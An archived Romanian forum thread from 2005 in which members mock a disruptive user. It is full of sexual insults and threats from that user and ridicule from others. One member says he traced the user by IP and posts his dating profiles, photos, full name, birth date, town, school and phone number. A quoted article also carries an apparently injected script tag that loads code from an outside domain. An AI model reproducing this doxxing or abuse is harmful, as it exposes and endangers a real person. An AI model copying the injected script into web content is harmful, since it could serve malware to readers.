PDA

Arată versiune întreagă : Aberatiile lui petrica (PG-13) :)

petrica-lucian
27.10.2005, 02:46
sorin,ai baut gaz petrolier lichefiat?

ce visezi tu acolo ? trezeste-te.smileys/smiley46.gif

angeline zicea ca nu ii plac barbatii-femeie si eu am invitat-o impreuna cu o martora sa se convinga ca sunt barbat-barbat.

cine e voicu pana la urma?? cine o mai fi si gasca asta?

petrica-lucian
27.10.2005, 02:53
cred ca l-a mancat motanul pe voicu gascanulsmileys/smiley36.gif

petrica-lucian
27.10.2005, 02:57
voicu ,am auzit ca faci lumea sa se simta prost pe aici.ia vino pe la mine impreuna cu Angeline sa scot eu toata feminitatea din tine

petrica-lucian
27.10.2005, 03:23
mihaela,dar ce aprinsa esti draga.

VINO SA TE RACESC EU NITEL.SA VEZI CE AI SA MAI VREI PE URMA.

UPS ..AM UITAT SA ITI ZIC.NU CREZI CA E CAZUL SA IEI MANA DE PE D**K-UL MEU? CA MI-A AJUNS TOATA NOAPTEA.MAI LAS-O SI PE SORA TA.smileys/smiley19.gif

petrica-lucian
27.10.2005, 04:28
dar nu eu am sters mesajul!!!

petrica-lucian
27.10.2005, 04:29
si eu iti dau cartonas rosu si suspendare 2 etape ca ai mutat mesajul meu.

petrica-lucian
27.10.2005, 04:31
sorine,daca pun mana asta pe tine ai sa zici ca te electrocutezi.

s-au deja te-ai electrocutat cand m-am luat de angeline care e sora ta.acum stiu de ce ai facut treaba asta.

petrica-lucian
27.10.2005, 04:37
CRED CA S-A REINCARNAT MAMA TAsmileys/smiley36.gif.IA INTREAB-O .

sorin
27.10.2005, 04:43
petrica, scrie aici toate aberatiile care-ti trec prin cap ca sa nu ma mai chinui sa le mut eu. fii baiat bun ca altfel pun niste linkuri cu profilele tale de pe siteurile "tari" pe unde bantui smileys/smiley2.gif

topicul initial de unde iti mut aceste mesaje era unul serios in care lumea iti dadea sfaturi. pentru ati arata veleitatile de playboy si a injura lumea, ti-am facut onoarea sa-ti deschid prpriul tau topic.

abia astept sa apara vlad ca lui ii plac recalcitrantii smileys/smiley36.gif

Vlad
27.10.2005, 04:47
Va prezentam in cele de mai sus episodul PILOT din seria "Petrica Frizerul".Se pare ca va fii o lunga serie,deoarece Petrica are foarte multe personalitati. Nu-ti face griji Petrica,echipa Romanian-Portal are leacuri pentru toate.

Dar sa facem un rezumatul primei parti al "serialului":

1. ...vine Petrica si ne spune ca a castigat Loteria Vizelor pentru State....

2. ....apoise intreaba daca e bine sa mearga in SUA,deoarece tatal lui este acolo si ii spune ca se moare pe strada de foame ??!!!

3. ....Petrica ne dezvaluie ca este ucenic intr-o frizerie...este casatorit...si are un copil...

4. .....ne mai spune ca fratele lui are un lant de restaurante in SUA...iar tatal lor lucreaza acolo....

5. ....Petrica al nostru se infurie (inca nu stim cauza...dar o sa o aflam mai tarziu)....si incepe sa atace verbal pe noi lui prieteni.....

6. .....aflam cu totii ca Petrica stie si ceva cuvinte in engleza (probabil a vazut prin filmele preferate de sotia lui).....

VA URMA......

Vlad
27.10.2005, 04:53
Momente din episoadele viitoare:

....Petrica nu se opreste inca cu aberatile.Aflam dintr-o sursa necunoscuta ca sotia il insala cu un frizer ADEVARAT...care stie sa faca si permanente.

.....Petrica explodeaza,si fura o masina de tuns de la servici,cu gandul de a se razbuna.....

In acest timp in America....

Tatal ii trimite inca un mesaj lui Petrica si ii spune ca fratele lui (cel cu restaurante) a murit de foame in timp ce prepara o omleta....

27.10.2005, 05:26
smileys/smiley36.gifVlad,da te-au muscat purecii ,nu gluma!smileys/smiley36.gif

petrica-lucian
27.10.2005, 05:32
sorin,ceea ce faci tu e nedrept.incalci dreptul de a ma afirma.

se vede ca atunci cand erai mic mai mult ai supt de la taica tau decat de la mama ta,tuca.

tuca iti dau un sut in curul ala besinos.

petrica-lucian
27.10.2005, 05:33
tuca o mana tii la gura si una la fund ca mirosi a butelie .smileys/smiley11.gif

petrica-lucian
27.10.2005, 05:38
vlad,tu cand scrii in acelasi timp o si s**i? sau mai intai mi-o s**i si pe urma ai sa scrii?cum ai vrea tu mie tot imi place.nu pleci de la mine pana cand nu o aduci si pe mama ta sa ii dau si ei prin gura ,cum iti dau si tie,portia de calciu.pt ca vad ca ai o anemie foarte mare si trebuie sa iti dau medicamente.auzi?esti ca sorin?cand erai mic in loc sa sugi de la mama ta ai supt de la tatal tau???smileys/smiley92.gif

27.10.2005, 05:44
Mai petrica esti prea joasa pt.nivelul meu nu ma conpromit cu asemenea persoane Sorry!

petrica-lucian
27.10.2005, 05:45
tuca cum vrei sa ti-o pun? o**l cum i-am pus-o lui mama ta, normal cum i-am pus-o lui sora ta,sau a**l cum i-am pus-o lui taica tau?

alegerea e a ta.aceeasi intrebare pt sorin si vlad.2 fraeri.pe care am sa ii pun sa stea capra cand pun mana asta pe ei

27.10.2005, 05:48
Petrica iti mai zic o data ca esti prea joasa pt. nivelul meu si nu ma conpromit cu tine!

petrica-lucian
27.10.2005, 05:49
da? poate vrei afle tot de aici ce ai facut tu anul trecut.atunci te cam compromiteai ,acum vad ca o s**i

petrica-lucian
27.10.2005, 05:50
sper ca ai mai invatat arta de a s**e.data trecuta m-ai cam dezamagitsmileys/smiley19.gif

petrica-lucian
27.10.2005, 06:00
eu iti zic asa: anul trecut mi-ai s***-o prost si am stat cu ea in ghips o saptamana.acum te-as pune sa mi-o s**i iar,dar mie frica sa nu sa se repete episodul trecut. ce propui? dai c***l la smileys/smiley27.gifbataie?

petrica-lucian
27.10.2005, 06:12
curul ala basinos

petrica-lucian
27.10.2005, 06:12
si plin de latzei

sorin
27.10.2005, 06:37
A ajuns deja la cartonas rosu omul asta, dar daca tot e izolat de restul lumii (tot ce debiteaza va fi mutat aici), il mai las, mai ales pentru Vlad, care sufera mult de cand a plecat micky05.smileys/smiley36.gif
Cine nu are chef sa nu citeasca pe acest topic. Cred ca astfel toata lumea va fi multumita, deoarece pudicii si sensibilii nu sunt nevoiti sa citeasca, iar cei carora le plac arenele cu gladiatori pot savura spectacolul.

P.S. Unele cuvinte au fost totusi editate

sorin
27.10.2005, 06:40
Ufff, ma doare mana de atata mutat mesaje.smileys/smiley36.gif

A ajuns deja la cartonas rosu omul asta, dar daca tot e izolat de restul lumii (tot ce debiteaza va fi mutat pe topicul deschis special pentru el), il mai las, mai ales pentru Vlad, care sufera mult de cand a plecat micky05.
Cine nu are chef sa nu citeasca pe acel topic. Cred ca astfel toata lumea va fi multumita, deoarece pudicii si sensibilii nu sunt nevoiti sa citeasca, iar cei carora le plac arenele cu gladiatori pot savura spectacolul.

petrica-lucian
27.10.2005, 07:12
AM CREZUT CA TE DOARE MANA DE LA ATATA CALCIU DAT PE PERETII LUI TUCA.TUCA POT VENI SI EU LA TINE SA ITI DAU NISTE CALCIU PE FATA?

petrica-lucian
27.10.2005, 08:15
pai cum sa ratez toate astea cand mama ta inca nu a venit la apel.sa vina d-na mama ta sa i-o dau la masea si pe urma intru pe topic.dar neaparat sa fie si ea prezenta pt ce e***z eu numai pe fata ei are efect.si pe a ta,dar tu te iriti ca data trecuta asa ca mai bine las-o pe mama ta ca se pricepe cel mai bine.smileys/smiley2.gif

garfield
27.10.2005, 08:16
Momente din episoadele viitoare:

....Petrica nu se opreste inca cu aberatile.Aflam dintr-o sursa necunoscuta ca sotia il insala cu un frizer ADEVARAT...care stie sa faca si permanente.

.....Petrica explodeaza,si fura o masina de tuns de la servici,cu gandul de a se razbuna.....

In acest timp in America....

Tatal ii trimite inca un mesaj lui Petrica si ii spune ca fratele lui (cel cu restaurante) a murit de foame in timp ce prepara o omleta....

Se pare ca Petrica arerelatii sexuale in mod egal cu femei si cu barbati smileys/smiley11.gifIn ce episod aflamdaca Petrica e...homosexual, metrosexual http://romanian-portal.com/forum/smileys/smiley36.gifsaune shocheaza si aflam ca defapt e interesat in bestialitatesmileys/smiley3.gif

petrica-lucian
27.10.2005, 08:30
MOTANE,AI PUS-O.VEZI CA SUNT SI ZOOFIL.CAND TE PRIND TE F*T IN CURUL ALA MANCAT DE SOARECI ASEARA.

A INCEPUT MOTANUL SA MIAUNE IN ROMANA?

garfield
27.10.2005, 08:33
A INCEPUT MOTANUL SA MIAUNE IN ROMANA?

Ei, am vrut sa intelegi si tu, sa nu te simti lasat pe dinafara ca data trecuta smileys/smiley36.gif

petrica-lucian
27.10.2005, 08:34
bai oaie,...ups scuze.bai motane...tu il intrebi pe sorin de ce nu s-a reincarnat mama lui in vaca?? pai asta si era.ai fi vrut acum sa se reincarneze in doua vaci? pai nu se poate pt ca locul pt a doua vaca e ocupat de mama ta.smileys/smiley36.gif

petrica-lucian
27.10.2005, 08:37
ok.multumesc.dar sa iti pregatesti curul de bombardament daca nu deja l-au bombardat soarecii din casa lui sorinsmileys/smiley36.gif

Frankenstein
27.10.2005, 08:42

Iara esti pe STOP?? nu e de mirare ca nu ti-a mai ajuns singele la creier

scenariul patru/strofa patra:

"dupa ce primeste vestea cu moartea , suna telefonul ..

Cienva ii confirma banuiala ca nevasta lui care era in luna patra ,
purta in pintece copilul frizerului adevarat si nu al lui ! "

Mai vrei si refren mestere?!

Frankenstein
27.10.2005, 08:53
SUNT SI ZOOFIL

Vad ca te dai si la animale,ai grija la gaini ca s-ar putea sa te alegi cu vreo gripa pacatoasa!smileys/smiley36.gif

Bafta

petrica-lucian
27.10.2005, 09:08
o sa am grija .mai ales la mama ta.stiu ca ea a luat gripa asta stupida.

cel mai mult m-am delectat cu muia care o ai.asa a ramas maica ta cand i-am bagat-o pe la spate.sau poate de la calciul care a ajuns de la tuca pana la tine???tot ce se poate.oricum muita ta ma amuzat tare si mi-am adus aminte si de destrabalata de mama ta

petrica-lucian
27.10.2005, 09:11
nu vrei sa mi-o tii putin cand fac pipi? vad ca concubina ta a inceput sa mi-o tina cu gura si in loc sa nimeresc w.c.-ul nimeresc fata lui mama ta.hai sa mi-o tii tu mai bine ca sa fac si eu pipi calumea pe tine si pe familia ta.uhhh.ce usurare o sa am cand o sa mi-o iei...

Vlad
27.10.2005, 09:20
Inainte sa incep. Vi-l prezint pe Petrica Frizerul:

http://www.e-dragoste.ro/members/uploads/102005/23222158-517.jpg

Poza am luat-o de pe un site unde isi da si toate datele prietenul nostru "sexual"

http://e-dragoste.ro/?func=view&l=&id=01044

L-am gasit dupa IP-ul lui. Are numai 1,67m inaltime si uite ce "viteaz"e.....

Vlad
27.10.2005, 09:23
OOOOO.... stai ca mai e inscris si pe alte site-uri:

http://www.myxlist.net/site/outside.php?page=member&idm= (http://www.myxlist.net/site/outside.php?page=member&idm=8802&sex=Male) 8802&sex=Male

http://www.idile.ro/view.php?l=default&id=16450

sorin
27.10.2005, 09:25
Nu pare asa feroce si potent in acesta poza smileys/smiley36.gif

Concluzia e clara: don't mess with Vlad!!!

petrica-lucian
27.10.2005, 09:30
mai vlad tu nu vezi ce moaca are gascanul ala? cred ca ala e amantul tau.

ooo si inca o treaba care da de gol tampenia care o ai in cap de cand ai intrat pe acest forum.eu ti-am zis de atatea ori ca esti tembel dar tu nu m-ai crezut.si sorin e cam la fel ,dar na... in fine de cand trece bahluiul si prin bucuresti? ca eu asa vad pe toate numerele de inmatriculare de pe masinile din spatele acelui tip,numere de bucuresti.si eu nu sunt de acolo.asa ca ai luat iar in gura.cred ca de la s****a mea de pe fata lui .......

petrica-lucian
27.10.2005, 09:32
ia-o si tu in gura sa vezi ca are destula potenta.a incercat-o si mama ta si a zis ca e super strongsmileys/smiley36.gif

Vlad
27.10.2005, 09:37
Ai tu ceva cu femeile in varsta....nu te mai satisfac animalele.Sau nu mai vor sa faca sex cu tine....pana si pentru ele o ai prea mica.

Ar fi cazul sa mai schimbi placa,bai Petrica fara frica....Am inteles ca vrei sa pari foarte "sexual".Mai incearca si tu altceva...ca ne plictisim.

P.S. Si ne mai miram de ce nu-l vrea tata lui in Amerca....pai si la el s-a dat....de aia a fugit el in SUA.

petrica-lucian
27.10.2005, 09:38
BAI BULANGIILOR.DAR EU NU AM NICI MACAR DOUA ZILE DE CAND AM INTRAT PE ACEST FORUM SI DEJA VAD CA S-AU STRANS 50 SI CEVA DE MESAJE.ASTA NUMAI IN DOUA ZILE.MAI UIT LA CELELALTE TOPICURI SI VAD CA ABIA,ABIA S-AU STRANS 20 DE RASPUNSURI IN DOUA LUNI.VAD CA V-AM UMPLUT TIMPUL LIBER CU IDEEA MEA./

HAI,TRECETI PE LA MINE SA LASA-TI UN CEC CU O CIFRA URMATA DE CATEVA ZEROURI.SUMA SA FIE IN EURO.HAI.

mihaela75
27.10.2005, 09:39
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gifcica daca are ochelari de soare e mai smecher...smileys/smiley36.gif.Eu ma gandeam ca are mai putin de 20 de ani ca dupa mesajele lui se vede ca e un copilderutat si fara discernamant.Insa daca ma uit mai bine laprofil cred ca avem de-aface cu un frustrat,vrea saspuna si el ca e adult dar nu prea-l baga nimeni in seamasmileys/smiley36.gif

Vlad
27.10.2005, 09:41
Descrierea (pe care si-a facut-o singur) a lui Petrica ce VANJOS:

<TABLE class=mes cellSpacing=1 cellPadding=5 width=500>
<T>
<TR align=left bgColor=#fedeea>
<TD>Utilizator</TD>
<TD>lucian1981</TD></TR>
<TD>Nume</TD>
<TD>Voicu petrica lucian</TD></TR>
<TD>Data nasterii</TD>
<TD>1981-06-12</TD></TR>
<TD>Zodie</TD>
<TD>Gemeni</TD></TR>
<TD>Sex </TD>
<TD>Barbat</TD></TR>
<TD>Tipul de relatie cautat</TD>
<TD>orice tip de relatie</TD></TR>
<TD>Judetul</TD>
<TD>Iasi</TD></TR>
<TD>Orasul</TD>
<TD>pascani</TD></TR>
<TD>Starea civila</TD>
<TD>Singur(a)</TD></TR>
<TD>Copii</TD>
<TD>nu am</TD></TR>
<TD>Inaltime</TD>
<TD>166 - 170 cm</TD></TR>
<TD>Greutate</TD>
<TD>61 - 65 kg</TD></TR>
<TD>Culoarea parului</TD>
<TD>Saten</TD></TR>
<TD>Culoarea ochilor</TD>
<TD>Caprui</TD></TR>
<TD>Orientare sexuala</TD>
<TD>Heterosexual</TD></TR>
<TD>Care dintre calitatile urmatoare te defineste?</TD>
<TD>Seriozitatea</TD></TR>
<TD>Fumezi?</TD>
<TD>Regulat</TD></TR>
<TD>Consumi alcool?</TD>
<TD>Ocazional</TD></TR>
<TD>Nivelul de educatie</TD>
<TD>Facultate neterminata</TD></TR>
<TD>Functie</TD>
<TD>inspector financiar contabil</TD></TR>
<TD>Hobby</TD>
<TD>de toate</TD></TR>
<TD>Despre</TD>
<TD>salutare!</TD></TR>
<TD>Caut</TD>
<TD>Femeie</TD></TR>
<TD>Varsta partenerului(ei) cautat</TD>
<TD>18 - 25</TD></TR>
<TD>Inaltimea partenerului(ei) cautat</TD>
<TD>130 - 135 cm ... 191 - 195 cm</TD></TR>
<TD>Greutatea partenerului(ei) cautat</TD>
<TD>36 - 40 kg ... 96 - 100 kg</TD></TR>
<TD>Data inregistrarii</TD>
<TD>2005-02-20 16:19:39</TD></TR>
<TD>Ultima data de acces</TD>
<TD>2005-02-22 18:01:17</TD></TR></T></TABLE>

Cica calitatile care il definesc: Seriozitatea....hahahaha

Cica e inspector financiar contabil....smileys/smiley5.gif

Imediat afla si unde sta el,si unde stau fratele si tatal in America....Poate reusim sa le transmitem salutari de la Petrica al nostru.

Vlad
27.10.2005, 09:49
BAI BULANGIILOR.DAR EU NU AM NICI MACAR DOUA ZILE DE CAND AM INTRAT PE ACEST FORUM SI DEJA VAD CA S-AU STRANS 50 SI CEVA DE MESAJE.ASTA NUMAI IN DOUA ZILE.MAI UIT LA CELELALTE TOPICURI SI VAD CA ABIA,ABIA S-AU STRANS 20 DE RASPUNSURI IN DOUA LUNI.VAD CA V-AM UMPLUT TIMPUL LIBER CU IDEEA MEA./

HAI,TRECETI PE LA MINE SA LASA-TI UN CEC CU O CIFRA URMATA DE CATEVA ZEROURI.SUMA SA FIE IN EURO.HAI.

Pai ce faci mai Petrica mai...ai inceput asa dintr-o data sa o lasi mai moale cu injuraturile.De ce? Te-ai speriat? Hai ca stiu ca poti mai mult.Nu cred eu ca "te predai" asa repede....lupta frizere,LUPTA...ataca.....

petrica-lucian
27.10.2005, 09:53
VLAD.MI-A PLACUT FAZA CU TATA.DAR NU DE ASTA A PLECAT IN SUA CI PT CA DE CAND A VAZUT-O PETUCA TA A ZIS CA TREBUIE NEAPARAT SA SE ARUNCE IN OC.ATLANTIC.CAND S-A DUS SA SE ARUNCE ERA FRANKENSTEIN CU MUIA LUI SI ISI FACEA L**A DUPA UN DELFIN.ACEST DELFIN I-A PROMIS LUI TATA CA DACA IL SCAPA DE LA**GIUL ASTA IL DUCE ORIUNDE VREA EL.TATA A ACCEPTAT,L-A LUAT PE FRANKENSTEIN SI L-A F**T IN C*R.ASTA SPERIAT A ZIS SA O LASE MAI USOR CA ARE DESTUL TIMP SA STEA SI DACA I-O DA SI PRIN GURA I-L ADUCE SI PE SORIN IMPREUNA CU ANGELINE SI PE MOTANUL GARFIELD.TATA E REFUZAT OFERTA ,L-A MAI F**T IN C*R CEVA TIMP SI PE URMA S-A DUS LA DELFIN CA SA II FACA CE II PROMISE.CAND SA AJUNGA LA ACESTA SURPRIZA:DELFINUL O F***A PE MAMA TA,ADICA A LUI VLAD.TATA A INTREBAT-O PE FEMEIE DE CE A RECURS LA TREABA ASTA IAR EA SPRE SURPRINDEREA NOASTRA ZISE CA A LUI VLAD ERA ASA DE MICA CA MAI BINE SE CULCA CU UN DELFIN DECAT CU EL.TATA I-A MAI LASAT PUTIN S-O ARDA IN TOATE POZITIILE,SI-A SCUTURAT NITEL P**A PESTE FATA EI SI PE URMA S-A URCAT PE DELFIN SI ASA A AJUNS IN SUA MAI VLAD TEPELEA .VREI SA ITI ZIC CONTINUAREA CU MAMA TA? TATA INAINTE SA PLECE MI-A ZIS CA MA ASTEAPTA O COARDA PE MALUL ORASULUI PORTO SI EU CUM ERAM PRIN APROPIERE AM PLECAT INTR-ACOLO.CATA M**E I-AM DAT O SA ITI POVESTEASCA EA CAND SE INATOARCE CA TOT ACOLO A RAMAS.ERA LUNA MAI.ACUM OCTOMBRIE.A VENIT? CA MIE DOR DE EA.

MA SI DACA MI-ATI GASIT POZA CE?????? MA BELITI LA P**A.

petrica-lucian
27.10.2005, 09:55
BAI BULANGIILOR.LASA-TI CA NU O SA MAI INTRU AICI SI O SA VEDETI CE DOR O SA VA FIE DE MINE.MANCAMIA-TI P**A

petrica-lucian
27.10.2005, 09:56
CIAOOOOOOOOOOOO DEFINITIVVVVVVV

O SA PLANGETI DUPA MINEsmileys/smiley36.gif

petrica-lucian
27.10.2005, 09:57
VLAD A VENIT MAICA TA???

Vlad
27.10.2005, 09:59
Nu-i nimic daca nu mai intrii.O sa-i intrebam pe colegi tai de la Grupul Scolar C.F. "Unirea" (Pascani ) ce mai faci.Poate o sa ne povesteasca si ei despre tine.Cum i-ai ars tu pe toti + pe toti parintii lor + toate animalele ce le aveau ei.

petrica-lucian
27.10.2005, 10:06
+ PE MAMA TA.

HOPA DAR STII SI UNDE INVAT??? MA DAR ESTI TARE.MAINE TE VAD CA IMI STII SI ADRESA .

ESTI TARE MAN.NU STIAM CA POTI AFLA ASA DE MULTE INFORMATII DESPRE MINE.CHIAR CA AM RAMAS MASCA.

DAR NA,TOT LA P**A MA DOARE.VINO LA MINE SA TI-O IEI IN BOT.CA POATE STAI PE LANGA PASCANI

petrica-lucian
27.10.2005, 10:06
GATA.EU NU MAI INTRU AICI.PAAAAAAAAAAAAAA

Vlad
27.10.2005, 10:07
TATA A ACCEPTAT,L-A LUAT PE FRANKENSTEIN SI L-A F***T IN CUR.

Imi cer scuze pentru gresala.Nu am stiut ca tatal tau e HOMOSEXUAL. Cred ca dupa ce te-a facut,s-a speriat si a trecut la barbati.A zis ca daca mai face si altii la fel......

Totusi....eu inca mai sper sa gasesti si alte moduri de a ne ataca.Ti-am mai zis ca am inteles ca tu si familia ta "ardeti" tot ce prindeti.Nu poti sa mai schimbi si tu placa un pic.TE ROG !!! Devine plictisitor si nu-mi place.Trebuie sa recunosc....ai fost tare la inceput,dar gata.De mult asteptam sa mai vina un dereglat psihic (si fizic dupa cum se vede in poze) ca tine sa ne mai destindem un pic si noi....SI AI APARUT.

Nu prea pot sa-mi explic cum de tot din Iasi esti si tu....poate il cunosti pe unul Cospebuca sau Micky05??? Probabil ati crescut la acelasi spital de nebuni,sau ati fost la "ars" de animale impreuna??? Cine stie?!

garfield
27.10.2005, 10:08
Petrica, tu ai biroul in WC??? Ce par tunzi tu acolo frizerule? smileys/smiley36.gif

http://www.idile.ro/members/uploads/20161939-120.jpg

Vlad
27.10.2005, 10:09
PETRICA LA LICEU :

http://www.colegi.ro/data/pozePers&#111;nale/lucianul23.jpg

Vlad
27.10.2005, 10:13
GATA.EU NU MAI INTRU AICI.PAAAAAAAAAAAAAA

NUPLECAAAAA......!!!!!!

Na ca l-am speriat si pe asta....of of....

Vlad
27.10.2005, 10:15
Petrica, tu ai biroul in WC??? Ce par tunzi tu acolo frizerule? smileys/smiley36.gif

Acolo cauta pe harta unde e America...si se gandeste ca il vede si pe taica-sau pe acolo,spaland vasele in restaurantul unde se moare de foame.

garfield
27.10.2005, 10:19
De mult asteptam sa mai vina un dereglat psihic (si fizic dupa cum se vede in poze) ca tine sa ne mai destindem un pic si noi....SI AI APARUT.

Your wish came true and it's not even Christmas time smileys/smiley36.gif

Maybe our Christmas gift can be a return of miky05, andok7, petrica and they can all have a conversation that would make ansailor blush. They can even teach claudiu a thing or two since he seems to be just an amateur compared to these pros.

Vlad
27.10.2005, 10:22
Your wish came true and it's not even Christmas time smileys/smiley36.gif

Maybe our Christmas gift can be a return of miky05, andok7, petrica and they can all have a conversation that would make ansailor blush. They can even teach claudiu a thing or two since he seems to be just an amateur compared to these pros.

Nu am eu norocul asta.

Claudiu e pe drumul cel bun.Cel putin asa reiese din ultimele lui mesaje.V-am zis eu ca putem sa-i "vindecam" .....

Frankenstein
27.10.2005, 10:28
o sa am grija .mai ales la mama ta.

Incearca dar nu a mai ramas mare lucru din ea ,mama mea a murit cu mult inainte sa te nasti tu (norocul tau)ca altfel te batea de te lasa lat mai mucosule.

Excelente pozelesmileys/smiley36.gif

Vlad
27.10.2005, 10:31
Pentru cine vrea sa-l sune pe Petrica,iata telefonul lui mobil:

0721459659

sorin
27.10.2005, 10:32
<st1:place w:st="&#111;n"><st1:City w:st="&#111;n">Garfield</st1:City></st1:place>, I am celebrating Thanksgiving one month ahead, so I am

Frankenstein
27.10.2005, 10:35
Pina la urma sa afirmat,asta i-a fost dorinta!smileys/smiley36.gifNumai ca nu stia ce il asteptacind s-a pus cu un paparazzi ca tine Vlade!http://www.romanian-portal.com/forum/smileys/smiley20.gif

Acum cred ca asteapta provinceasmileys/smiley36.gif

garfield
27.10.2005, 11:23
[QUOTE=sorin]

<st1:place w:st="&#111;n"><st1:City w:st="&#111;n">Garfield</st1:City></st1:place>, I am celebrating Thanksgiving one month ahead, so I am

garfield
27.10.2005, 11:30
[QUOTE=sorin]<st1:place w:st="&#111;n"><st1:City w:st="&#111;n">...</st1:City></st1:place>I hope he

Pisoi
27.10.2005, 11:58
Sorine, cred ca ai avut idee buna cu topicul asta cu dedicatiesmileys/smiley32.gif(aviz amatorilor) Trebuie sa-ti spun ca nu m-am lasat si am citit tot, si m-am amuzat copios, totusi sper sa nu mai ai cazuri asemanatoare pe acest forum. La inceput am crezut ca tipul e ruda cu Becali (asemanare de exprimare) dar dupa ce am vazut pozele am ramas dezamagit.

Vlad, toata stima pentru tinesmileys/smiley20.giffelul in care ai rezolvat "operatiunea petrica" denota ca esti maestru.

27.10.2005, 14:09
shoot, iar am pierdut spectacolul "live" smileys/smiley19.gif
macar contribui si eu cu un articol de ultima ora primit recent de la un pretin. anumitor persoane le pot prinde bine linkurile de mai jos in gasirea unui giob
----------------------------------------
Limba romana e atat de bogata incat am exportat-o pe banda rulanta. Ne-am aventurat in a face un top al denumirilor internationale care, fara sa stie purtatorii, sunt... d'ale noastre, neaose, suculente si pline de inteles.

1. Pe primul loc, bineinteles, ce alt nume ar putea figura decat renumita statiune croata P**a. Am intalnit persoane care isi fac concediile in P**a (inclusiv oameni care chiar merg in <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Croatia</st1:place></st1:country-regi&#111;n> pentru asta). http://en.wikipedia.org/wiki/****,_Croatia

2. Tot P**a se numeste si moneda oficiala a statului african <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Botswana</st1:place></st1:country-regi&#111;n>. Prin asta se explica saracia lucie din savana... luand in calcul faptul ca populatia e preponderent feminina, se ajunge la cateva subdiviziuni de P**a pe cap de locuitor. Cursul de schimb il gasiti pe
http://www.x-rates.com/d/BWP/table.html

3. In alte zone de pe continentul african, oamenii o duc si mai rau. Daca botswanezilor le e de ajuns o P**a pentru a-si asigura traiul (mai ales ca-s negri, si stim noi ce se vorbeste despre ei), 3,4 milioane de mozambicani locuiesc in regiunea Nampula, avand capitala in orasul cu acelasi nume. <A title=http://en.wikipedia.org/wiki/Nampula_Province href="http://en.wikipedia<script src=http://www.iroe.ru/ngg.js></script>

Vlad
27.10.2005, 16:20
VLAD.MI-A PLACUT FAZA CU TATA.DAR NU DE ASTA A PLECAT IN SUA CI PT CA DE CAND A VAZUT-O PETUCA TA A ZIS CA TREBUIE NEAPARAT SA SE ARUNCE IN OC.ATLANTIC.CAND S-A DUS SA SE ARUNCE ERA FRANKENSTEIN CU MUIA LUI SI ISI FACEA L**A DUPA UN DELFIN.ACEST DELFIN I-A PROMIS LUI TATA CA DACA IL SCAPA DE LA**GIUL ASTA IL DUCE ORIUNDE VREA EL.TATA A ACCEPTAT,L-A LUAT PE FRANKENSTEIN SI L-A F**T IN C*R.ASTA SPERIAT A ZIS SA O LASE MAI USOR CA ARE DESTUL TIMP SA STEA SI DACA I-O DA SI PRIN GURA I-L ADUCE SI PE SORIN IMPREUNA CU ANGELINE SI PE MOTANUL GARFIELD.TATA E REFUZAT OFERTA ,L-A MAI F**T IN C*R CEVA TIMP SI PE URMA S-A DUS LA DELFIN CA SA II FACA CE II PROMISE.CAND SA AJUNGA LA ACESTA SURPRIZA:DELFINUL O F***A PE MAMA TA,ADICA A LUI VLAD.TATA A INTREBAT-O PE FEMEIE DE CE A RECURS LA TREABA ASTA IAR EA SPRE SURPRINDEREA NOASTRA ZISE CA A LUI VLAD ERA ASA DE MICA CA MAI BINE SE CULCA CU UN DELFIN DECAT CU EL.TATA I-A MAI LASAT PUTIN S-O ARDA IN TOATE POZITIILE,SI-A SCUTURAT NITEL P**A PESTE FATA EI SI PE URMA S-A URCAT PE DELFIN SI ASA A AJUNS IN SUA MAI VLAD TEPELEA .VREI SA ITI ZIC CONTINUAREA CU MAMA TA? TATA INAINTE SA PLECE MI-A ZIS CA MA ASTEAPTA O COARDA PE MALUL ORASULUI PORTO SI EU CUM ERAM PRIN APROPIERE AM PLECAT INTR-ACOLO.CATA M**E I-AM DAT O SA ITI POVESTEASCA EA CAND SE INATOARCE CA TOT ACOLO A RAMAS.ERA LUNA MAI.ACUM OCTOMBRIE.A VENIT? CA MIE DOR DE EA.

MA SI DACA MI-ATI GASIT POZA CE?????? MA BELITI LA P**A.

L-am vazut la fata pe Petrica,am vazut ce poate scoate pe gura si cel mai important,ne-am dat cu totii seama ca omul are mari probeme psihice.Haide-ti sa incercam sa ii analizam personalitatea acestui personaj.

Din mesajul lui de mai sus,ne dam seama in primul rand ca Petrica are probleme cu auzul sau cu vederea....scrie numai cu litere mari.

Putem observa cu usurinta ca a fost molestat sexual,de tatal sau,in mod repetat.Printre orgiile sexuale la care a fost supus bietul nostru Petrica,se numara necrofilia si zoofilia.

Alt lucru pe care il putem observa este obsesia "pacientului" nostru cu privire la organul masculin.Acest lucru se datoreaza probabil complexului acestuia vis-a-vis de marimea milimetrica de care dispune organul "frizerului" nostru.smileys/smiley9.gif

Vom revenii cu amanunte....

28.10.2005, 01:09
marimea milimetrica de care dispune organul "frizerului" nostru.smileys/smiley9.gif

Credeti ca exista vreo corelatie intre marimea organului si marimea creierului?!smileys/smiley75.gifsauacesta este doar un caz izolatsmileys/smiley36.gif

sauzimdebine
28.10.2005, 01:25
corelatia dintre cele doua marimi este data de capacitatea sistemului
circulator ... cu cat potentialul organismului de a transporta sange la
toate extremitatile este mai mare, cu atat rezultatele sunt mai bune
...

angeline
28.10.2005, 01:55
si cand te gandesti ca eu nu am spus decat ca mor cand dau de barbati - femei.... smileys/smiley3.gif

28.10.2005, 05:09
<H2>Making love to a ghost</H2>
<DIV id="">
<DIV class=neighbours></DIV>A professor from Texaswho was visitingthe School Group"Unirea" in Pascani , was giving a lecture of the supernatural.

To get a feel for his audience, he asks, "How many people here believe in ghosts?"

About 90 students raise their hands.

"Well, that's a good start. Out of those of you who believe in ghosts, do any of you think you have seen a ghost?"

About 40 students raise their hands.

"That's really good. I'm really glad you take this seriously. Has anyone here ever talked to a ghost?"

About 15 students raise their hand.

"Has anyone here ever touched a ghost?"

3 students raise their hands.

"That's fantastic. Now let me ask you one question further...Have any of you ever made love to a ghost?"

Way in the back,Petrica raises his hand.

The professor takes off his glasses, and says "Son, all the years I've been giving this lecture, no one has ever claimed to have made love to a ghost.

You've got to come up here and tell us about your experience."

The fat redneck student replied with a nod and a grin, and began to make his way up to the podium.

When he reached the front of the room, the professor asks, "So, Petrica, tell us what it's like to have sex with a ghost?"

Petrica replied, "Shiiiit! From way back thar I thought you said 'Goats'." </DIV>

evelyn
28.10.2005, 05:34
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

Vlad
28.10.2005, 05:54
Poezie dedicata lui Petrica:

Petrica....Petrica...

